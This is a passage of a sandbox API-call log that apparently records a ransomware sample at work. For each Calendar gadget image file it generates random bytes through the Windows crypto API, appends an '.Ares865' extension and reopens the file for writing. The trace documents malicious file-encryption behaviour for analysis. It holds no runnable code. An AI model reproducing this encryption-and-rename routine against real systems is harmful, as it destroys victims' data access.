dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.694] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=574) returned 1 [0119.694] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.695] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.695] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.698] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.699] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.699] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.699] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.Ares865") returned 87 [0119.700] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev.png.ares865"), dwFlags=0x1) returned 1 [0119.701] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.701] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=216) returned 1 [0119.702] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.702] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.703] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.705] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.706] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.706] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.708] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.Ares865") returned 97 [0119.709] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double.png.ares865"), dwFlags=0x1) returned 1 [0119.711] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.711] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2262) returned 1 [0119.711] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.712] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.712] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.716] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.717] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.717] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.717] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png.Ares865") returned 101 [0119.717] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double_bkg.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double_bkg.png.ares865"), dwFlags=0x1) returned 1 [0119.720] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double_bkg.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.720] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3009) returned 1 [0119.720] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.721] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.721] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.725] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.726] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.726] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.727] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_orange.png.Ares865") returned 104 [0119.727] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_orange.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double_orange.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_orange.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double_orange.png.ares865"), dwFlags=0x1) returned 1 [0119.728] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_orange.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double_orange.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.728] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3541) returned 1 [0119.729] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.729] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.729] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.733] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.734] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.734] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.734] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_ring_docked.png.Ares865") returned 102 [0119.734] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_ring_docked.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_ring_docked.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_ring_docked.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_ring_docked.png.ares865"), dwFlags=0x1) returned 1 [0119.736] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_ring_docked.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_ring_docked.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.736] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3026) returned 1 [0119.737] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.737] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.737] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.742] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.743] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.743] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.744] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single.png.Ares865") returned 97 [0119.744] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_single.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_single.png.ares865"), dwFlags=0x1) returned 1 [0119.745] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_single.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.745] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1500) returned 1 [0119.746] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.746] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.746] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.749] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.750] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.750] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.750] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_bkg.png.Ares865") returned 101 [0119.750] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_bkg.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_single_bkg.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_bkg.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_single_bkg.png.ares865"), dwFlags=0x1) returned 1 [0119.753] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_bkg.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_single_bkg.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.754] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3544) returned 1 [0119.754] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.755] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.755] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.757] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.758] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.758] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.759] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_bkg_orange.png.Ares865") returned 108 [0119.759] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_bkg_orange.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_single_bkg_orange.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_bkg_orange.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_single_bkg_orange.png.ares865"), dwFlags=0x1) returned 1 [0119.760] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_bkg_orange.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_single_bkg_orange.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.760] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4773) returned 1 [0119.761] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.761] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.761] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.774] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.775] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.775] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.775] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_orange.png.Ares865") returned 104 [0119.775] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_orange.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_single_orange.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_orange.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_single_orange.png.ares865"), dwFlags=0x1) returned 1 [0119.779] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_single_orange.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_single_orange.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.779] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2726) returned 1 [0119.779] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.780] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.780] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.784] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.785] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.785] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.786] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\corner.png.Ares865") returned 88 [0119.786] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\corner.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\corner.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\corner.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\corner.png.ares865"), dwFlags=0x1) returned 1 [0119.787] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\corner.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\corner.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.788] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=214) returned 1 [0119.788] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.789] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.789] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.794] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.795] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.795] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.795] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\curl-hot.png.Ares865") returned 90 [0119.795] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\curl-hot.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\curl-hot.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\curl-hot.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\curl-hot.png.ares865"), dwFlags=0x1) returned 1 [0119.797] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\curl-hot.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\curl-hot.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.797] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1016) returned 1 [0119.797] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.798] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.798] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.803] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.807] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.807] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.808] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\curl.png.Ares865") returned 86 [0119.808] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\curl.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\curl.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\curl.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\curl.png.ares865"), dwFlags=0x1) returned 1 [0119.809] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\curl.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\curl.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.809] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=896) returned 1 [0119.810] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.810] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.810] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.814] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.815] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.815] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.816] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\month.png.Ares865") returned 87 [0119.816] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\month.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\month.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\month.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\month.png.ares865"), dwFlags=0x1) returned 1 [0119.817] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\month.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\month.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.818] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=150) returned 1 [0119.818] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0119.819] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.819] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0119.832] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0119.833] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.833] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 